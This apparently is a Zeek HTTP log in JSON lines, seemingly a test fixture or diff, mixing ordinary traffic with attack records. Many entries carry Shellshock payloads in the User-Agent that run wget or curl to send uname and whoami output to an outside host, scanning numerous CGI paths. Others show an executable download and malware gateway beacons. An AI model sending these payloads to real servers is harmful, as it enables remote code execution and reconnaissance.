+{"ts":"2018-08-03T23:39:01.164535Z","uid":"CihU8r1Kgy9oDV9wkc","id.orig_h":"192.168.0.54","id.orig_p":53181,"id.resp_h":"93.184.220.29","id.resp_p":80,"trans_depth":3,"method":"GET","host":"ocsp.digicert.com","uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTtSK3dy3sA4g6EKqm0CfGsMDTPlgQUUOpzidsp+xCPnuUBINTeeZlIg/cCEAgJ4WkUHggHhNF3xklYa/o=","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":471,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FisiibViFK37KrIi4"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:39:01.164535Z","uid":"CtWkom2z2JhFaNklL5","id.orig_h":"192.168.0.53","id.orig_p":3679,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","version":"1.1","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"status_code":200,"status_msg":"OK","tags":[]} +{"ts":"2018-08-03T23:38:56.192546Z","uid":"CRxR9U2rKjisXFXcJ8","id.orig_h":"192.168.0.53","id.orig_p":1854,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.207542Z","uid":"Cmn5Ti2zuN5gg4OfXd","id.orig_h":"146.52.78.242","id.orig_p":3175,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-sys/signup.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.207542Z","uid":"CcoyBk2zouTCcqxoZi","id.orig_h":"146.52.78.242","id.orig_p":4967,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/faqmanager.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.217892Z","uid":"CWylKCjxrzUfs6cR","id.orig_h":"146.52.78.242","id.orig_p":3158,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/bb-ack.shHTTP/1.0","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.156487Z","uid":"CFQ62n1ch4zqAnRlfi","id.orig_h":"192.168.0.54","id.orig_p":53164,"id.resp_h":"178.255.83.1","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ocsp.comodoca.com","uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69+Aj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc=","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":727,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["Fxpa3k3Z4xhFT1hDHg"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:38:56.159416Z","uid":"CTov9y4PvEBIH4HQPg","id.orig_h":"192.168.0.54","id.orig_p":62225,"id.resp_h":"2.23.159.132","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.microsoft.com","uri":"/pkiops/crl/MicSecSerCA2011_2011-10-18.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.167933Z","uid":"CFPCR53CblQCuW8cJ1","id.orig_h":"192.168.0.54","id.orig_p":53158,"id.resp_h":"69.172.216.55","id.resp_p":80,"trans_depth":1,"method":"GET","host":"pixel.adsafeprotected.com","uri":"/mon?anId=110\u0026advId=228333\u0026campId=7750927\u0026pubId=280\u0026placementId=25496859\u0026adsafe_par\u0026bidurl=skype.com\u0026bidPr=0.371419\u0026uId=8864689288106762817\u0026impId=2781055165952063775\u0026adsafe_url=https://apps.skype.com/chatadwidget/?containerType=NR\u0026adsafe_type=c\u0026adsafe_url=https://static.skypeassets.com/adserver/AdLoader.html?version=1.66.4\u0026adsafe_type=d\u0026adsafe_url=https://static.skypeassets.com/adserver/AdLoader.html?version=1.66.4#pgqp:%26SKID%3Dfdc256726fe284b6b490bfa128de6f14%26PG%3DSKYSESV5%26AP%3D2370%26GENDER%3DM%26CAGE%3D39%26sklang%3Den%26SKYEXP%3D1;wt:728;ht:90;tkn:35710;divid:bigNorthAd\u0026adsafe_type=b\u0026adsafe_jsinfo=,c:9EYAAH,sl:na,em:true,fr:false,pt:1-5-15,br:i,fv:0,bv:10,dm:10,abv:11,an:m,id:d8072f44-e1bf-11e4-8ed9-002590882ea0,fm:p9J6aah+111*.110|1111,pl:,rpx:0,bl:0,fc:0,rt:0,cb:0,np:0,th:0,uf:1,tt:jload,et:16,uid:72b88b9a62e6fed62a975e8b501345,v:9.1,sp:0,ct:na,dtm:i,mn:app19ami,gtpl:0,wr:977.618,sr:1920.1080,mf:1066915688,ov:0","version":"1.1","user_agent":"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)","request_body_len":0,"response_body_len":43,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FxhDT11EhxpuOFDFH7"],"resp_mime_types":["image/gif"]} +{"ts":"2018-08-03T23:39:01.167933Z","uid":"CTgbPi233oQ8d2Cduj","id.orig_h":"192.168.0.54","id.orig_p":53160,"id.resp_h":"69.172.216.111","id.resp_p":80,"trans_depth":1,"method":"GET","host":"dt.adsafeprotected.com","uri":"/dt?asId=d8072f44-e1bf-11e4-8ed9-002590882ea0\u0026tv={c:9EYAAV,pingTime:-2,time:28,type:a,bl:0,fc:0,rt:0,cb:0,np:0,th:0,slTimes:{i:0,o:0,n:28,pp:0,pm:0,gpp:0,gpm:0,gi:28,go:0,gn:0,fi:0,fo:0,fn:28},slEvents:[{sl:n,fsl:fn,gsl:gi,t:25,wc:548.219.977.618,ac:837.269.728.90,am:i,cc:,piv:-1,obst:0,th:0,reas:,cmps:1,bkn:{piv:[20~1],as:[20~728.90]}}],slEventCount:1,em:true,fr:false,uf:1,e:,tt:jload,dtt:0,fm:p9J6aah+111*.110|1111,pl:,sinceFw:10,readyFired:true}\u0026br=i","version":"1.1","user_agent":"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)","request_body_len":0,"response_body_len":43,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FuvLpBIJ2Rqrd7VOb"],"resp_mime_types":["image/gif"]} +{"ts":"2018-08-03T23:39:01.167933Z","uid":"CDF7Kd0MGdAcvr2Nd","id.orig_h":"192.168.0.53","id.orig_p":3680,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","version":"1.1","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"status_code":200,"status_msg":"OK","tags":[]} +{"ts":"2018-08-03T23:38:56.201369Z","uid":"CJ9i3S2O7RHsEgywk","id.orig_h":"146.52.78.242","id.orig_p":4800,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/traffic.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.231688Z","uid":"Cjx8ox1gRN7spVGjvk","id.orig_h":"146.52.78.242","id.orig_p":2751,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/shopper.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.160408Z","uid":"CZ2M084CPCpBmiKW48","id.orig_h":"192.168.0.54","id.orig_p":53186,"id.resp_h":"23.43.139.27","id.resp_p":80,"trans_depth":1,"method":"GET","host":"sd.symcd.com","uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQMgSk4dLKWKRB+2DViUmQEUw3ggwQUDURcFlNEwYJ+HSCrJfQBY9i+eaUCEB9qr3h/5kCrvDFKPevkNKc=","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":1730,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["Fo4abV2WaSUGP12Cn3"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:38:56.204111Z","uid":"Cj5uVU1XfglaFmZ7fc","id.orig_h":"146.52.78.242","id.orig_p":4156,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/html/cgi-bin/cgicsoHTTP/1.0","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.214244Z","uid":"C6rvGI2Ys0t5uTcFfe","id.orig_h":"146.52.78.242","id.orig_p":2310,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/lookwho.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.229456Z","uid":"Cx4PE8aS9kvFYe7x4","id.orig_h":"146.52.78.242","id.orig_p":1912,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/nlog-smb.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.347346Z","uid":"C25Ru4UZO4EgKROZ8","id.orig_h":"172.16.253.130","id.orig_p":1069,"id.resp_h":"69.49.96.18","id.resp_p":80,"trans_depth":1,"method":"GET","host":"valeriemesedahl.com","uri":"/images/cacax.exe","version":"1.1","user_agent":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)","request_body_len":0,"response_body_len":119296,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FISJc7YSDyP0IIgZj"],"resp_mime_types":["application/x-dosexec"]} +{"ts":"2018-08-03T23:38:56.221039Z","uid":"CFzhHh3LkrLfkw65Ka","id.orig_h":"146.52.78.242","id.orig_p":4930,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/af.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.221039Z","uid":"CcEF5E24bJQN7oXC7g","id.orig_h":"146.52.78.242","id.orig_p":1566,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/pollssi.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.221039Z","uid":"CzcY0U3bCx9T0l7nq7","id.orig_h":"146.52.78.242","id.orig_p":1710,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.236232Z","uid":"CaE8Ef2gFuoMo80Co","id.orig_h":"146.52.78.242","id.orig_p":1515,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/.cobalt/message/message.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:15.095329Z","uid":"CoBbdt16zP5OKqXG59","id.orig_h":"192.168.0.53","id.orig_p":1940,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.172544Z","uid":"Ch6ePR1kvx55PsRkV5","id.orig_h":"192.168.0.54","id.orig_p":53179,"id.resp_h":"93.184.220.29","id.resp_p":80,"trans_depth":3,"method":"GET","host":"ocsp.digicert.com","uri":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTtSK3dy3sA4g6EKqm0CfGsMDTPlgQUUOpzidsp+xCPnuUBINTeeZlIg/cCEAOCWfF2ZgFTKsEK/Qr36tA=","version":"1.1","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":471,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FCvhQ236VaSeaotU92"],"resp_mime_types":["application/ocsp-response"]} +{"ts":"2018-08-03T23:38:56.206296Z","uid":"C9ukSx3M3KZbVoKOz5","id.orig_h":"146.52.78.242","id.orig_p":4864,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/shop.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.221513Z","uid":"CW4CzuXjtLQ5Wxkrh","id.orig_h":"146.52.78.242","id.orig_p":3771,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/robpoll.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.236654Z","uid":"Ci8Wr712NntwZfH0j8","id.orig_h":"146.52.78.242","id.orig_p":4648,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/gm.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.205581Z","uid":"CSFtHq4T0aAFHslNB7","id.orig_h":"146.52.78.242","id.orig_p":3153,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/spin_client.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.205581Z","uid":"CdNuX24Ig9SWMxep7d","id.orig_h":"146.52.78.242","id.orig_p":1586,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/mail/nph-mr.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.218882Z","uid":"CrAxNB32qKPjVXTyO6","id.orig_h":"146.52.78.242","id.orig_p":3906,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/cvslog.cgi","referrer":"http://google.com ","user_agent":"() { :; }; wget -qO - http://54.248.244.82/s.php?w1-`uname`-`uname -p`-`whoami` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.218882Z","uid":"CuaEy22oAXqfBgXD92","id.orig_h":"146.52.78.242","id.orig_p":1227,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/webtools/bonsai/cvslog.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.234085Z","uid":"CpzMmnPEGpOL5LGtk","id.orig_h":"146.52.78.242","id.orig_p":3885,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/blog/mt-check.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.232339Z","uid":"Cvdaha2KYqe7KZUMn6","id.orig_h":"146.52.78.242","id.orig_p":3244,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/ttawebtop.cgi/HTTP/1.0","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.256937Z","uid":"CcXPIs3pq1Eat2kctl","id.orig_h":"192.168.0.53","id.orig_p":1892,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.231326Z","uid":"CZsyPVFKSkRIxw6R9","id.orig_h":"146.52.78.242","id.orig_p":3667,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/cgi-bin/ezboard.cgi","referrer":"http://google.com ","user_agent":"() { :; }; curl http://54.248.244.82/s.php?c1-`uname -p` ","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.443881Z","uid":"CxxgpI1c7ayOordrae","id.orig_h":"192.168.0.54","id.orig_p":62809,"id.resp_h":"2.23.159.132","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.microsoft.com","uri":"/pkiops/crl/MicSecSerCA2011_2011-10-18.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.350095Z","uid":"CEVlen4iI94wLYUyW4","id.orig_h":"172.16.253.130","id.orig_p":1067,"id.resp_h":"213.57.77.220","id.resp_p":80,"trans_depth":1,"method":"POST","host":"real-newslife.com","uri":"/postnuke/blog.php","version":"1.1","user_agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)","request_body_len":84,"response_body_len":78,"status_code":200,"status_msg":"OK","tags":[],"orig_fuids":["Fxhq6NC2R5vXIQLEc"],"resp_fuids":["FnnBRwBigZJPNf8Ib"]} +{"ts":"2018-08-03T23:39:01.350095Z","uid":"CEVlen4iI94wLYUyW4","id.orig_h":"172.16.253.130","id.orig_p":1067,"id.resp_h":"213.57.77.220","id.resp_p":80,"trans_depth":2,"method":"POST","host":"real-newslife.com","uri":"/postnuke/blog.php","version":"1.1","user_agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)","request_body_len":63,"response_body_len":4,"status_code":200,"status_msg":"OK","tags":[],"orig_fuids":["FRbIM23lj3qjsQPntf"],"resp_fuids":["FnDq1R3FewSfvfI2ig"]} +{"ts":"2018-08-03T23:38:56.420480Z","uid":"COtMih1GnZ0RLgFCM1","id.orig_h":"192.168.0.51","id.orig_p":44252,"id.resp_h":"216.58.209.132","id.resp_p":80,"trans_depth":2,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/image?c=03AHJ_VuuCePDHHgp0-KNqWNZ_7gvKzrqGGzD4a2ZC55_Jqo7eDhMLlQ-D2nQylvAS7UGyldK2Mvd7uxJyw236-O3wK8ANzTQJ_mZd44GsyIA8VVZjnSr8i2WB7WK-ApydIltJ3yBpiZQIiVU1sm8pz_zEgZ6SY0-pjdfRetHvfqs3L5UNgo4Tp8AIg_bUzdBVsix7BG98m8hrLnQf91ZhJaaT4yvCoEldklu_dtukJou1-NlUn3eUyfsMjsTCCtCUa4siX905iCAK7dBHePB8NqDgc_sJagzh2w\u0026th=,2Siw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAD2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJbHrOHrEMuIGim4jg","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[],"resp_fuids":["Fl55Np43MdYwePJ2V9"]} +{"ts":"2018-08-03T23:38:56.553323Z","uid":"CnhSwHpdanZpSAIzb","id.orig_h":"192.168.0.51","id.orig_p":44291,"id.resp_h":"216.58.209.132","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/reload?c=03AHJ_VuvWJwxSAU6R44NFdGimEFayMVVbWq7A2XrVuNSfFaUbVT9wyLunZXXfghpTzEhJHf8dLDAhWFEECpThGgkZRcQha-jx4N3uzC3HQ4wUAX0K3MDjpYjpMRYMpOCaeSYou2GKycrvJ8NCNS_DbtgTiGLd2rygbX6wZ7_mNAzx7LrrawgRArXd5ZfMmSxYYx7GpvVrtBVEnxHfNBr2ypfDViGZ64eTeRcM_EVH1nbbHkTXyrxpym-RYpTeCAOEzWhiJKWVwqKuk3_icMRGJv5oUEFIawPkLQ\u0026k=6LdzYN4SAAAAAEZIKBG_PKLJlSAaMBMeODFH2jxE\u0026reason=t\u0026type=image\u0026lang=sv\u0026th=,6huw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAE2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJSGrO4VPnUk8vv4hw","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.348136Z","uid":"CePnfE1y3dBQssIQui","id.orig_h":"172.16.253.130","id.orig_p":1070,"id.resp_h":"37.0.122.142","id.resp_p":80,"trans_depth":1,"method":"POST","host":"37.0.122.142","uri":"/alfa/gateway.php","version":"1.1","user_agent":"Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)","request_body_len":153,"response_body_len":0,"status_code":200,"status_msg":"OK","tags":[],"orig_fuids":["Fe7SeI1D2svsba8Ab6"],"orig_mime_types":["text/plain"]} +{"ts":"2018-08-03T23:39:01.396848Z","uid":"Cp9V7f97tFlv7lCXa","id.orig_h":"192.168.2.16","id.orig_p":1578,"id.resp_h":"75.126.203.78","id.resp_p":80,"trans_depth":1,"method":"POST","host":"download913.avast.com","uri":"/cgi-bin/iavs4stats.cgi","version":"1.1","user_agent":"Syncer/4.80 (av_pro-1169;f)","request_body_len":589,"response_body_len":0,"status_code":204,"status_msg":"","tags":[],"orig_fuids":["F8ZArc3AEoU360wXz4"],"orig_mime_types":["text/plain"]} +{"ts":"2018-08-03T23:39:01.395376Z","uid":"Cagh9z3dzMgU6VJAY5","id.orig_h":"2001:0:4137:9e50:8000:f12a:b9c8:2815","id.orig_p":1286,"id.resp_h":"2001:4860:0:2001::68","id.resp_p":80,"trans_depth":1,"method":"GET","host":"ipv6.google.com","uri":"/","version":"1.1","user_agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5","request_body_len":0,"response_body_len":6640,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["FDe3Q32ePdleKKyzU2"],"resp_mime_types":["text/html"]} +{"ts":"2018-08-03T23:39:01.395376Z","uid":"Cagh9z3dzMgU6VJAY5","id.orig_h":"2001:0:4137:9e50:8000:f12a:b9c8:2815","id.orig_p":1286,"id.resp_h":"2001:4860:0:2001::68","id.resp_p":80,"trans_depth":2,"method":"GET","host":"ipv6.google.com","uri":"/search?hl=en\u0026q=Wireshark+!\u0026btnG=Google+Search","referrer":"http://ipv6.google.com/","version":"1.1","user_agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5","request_body_len":0,"response_body_len":25119,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["Fk6BIj27gG9PcGcaZh"],"resp_mime_types":["text/html"]} +{"ts":"2018-08-03T23:38:56.541042Z","uid":"CBoC6a2ZyQl7aHCNA3","id.orig_h":"192.168.0.53","id.orig_p":2283,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.393904Z","uid":"CjGeweb5RYoY46Ak9","id.orig_h":"192.168.2.16","id.orig_p":1580,"id.resp_h":"67.228.110.120","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.wireshark.org","uri":"/","referrer":"http://ipv6.google.com/search?hl=en\u0026q=Wireshark+%21\u0026btnG=Google+Search","version":"1.1","user_agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5","request_body_len":0,"response_body_len":11845,"status_code":200,"status_msg":"OK","tags":[],"resp_fuids":["F981Gx3D44SHtctqg3"],"resp_mime_types":["text/html"]} +{"ts":"2018-08-03T23:38:56.591992Z","uid":"CdCNjY3mVQExKXyaE5","id.orig_h":"192.168.0.53","id.orig_p":2343,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.656170Z","uid":"CieVOz3rY3maenhWi","id.orig_h":"192.168.0.54","id.orig_p":63275,"id.resp_h":"198.199.14.134","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.technologieduluth.com","uri":"/webenhancer/update?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=\u0026retry_count=0\u0026retry_version=\u0026sc=1\u0026scfr=\u0026avs=0,0,0,0,0,0,0,0,0,0,0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.717063Z","uid":"CzJfvSjkyDEX2Zjab","id.orig_h":"192.168.0.53","id.orig_p":2679,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.752549Z","uid":"CZXhMF36HtB9W04YNa","id.orig_h":"192.168.0.54","id.orig_p":63446,"id.resp_h":"198.199.14.135","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.technologieduluth.com","uri":"/webenhancer/injections?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} 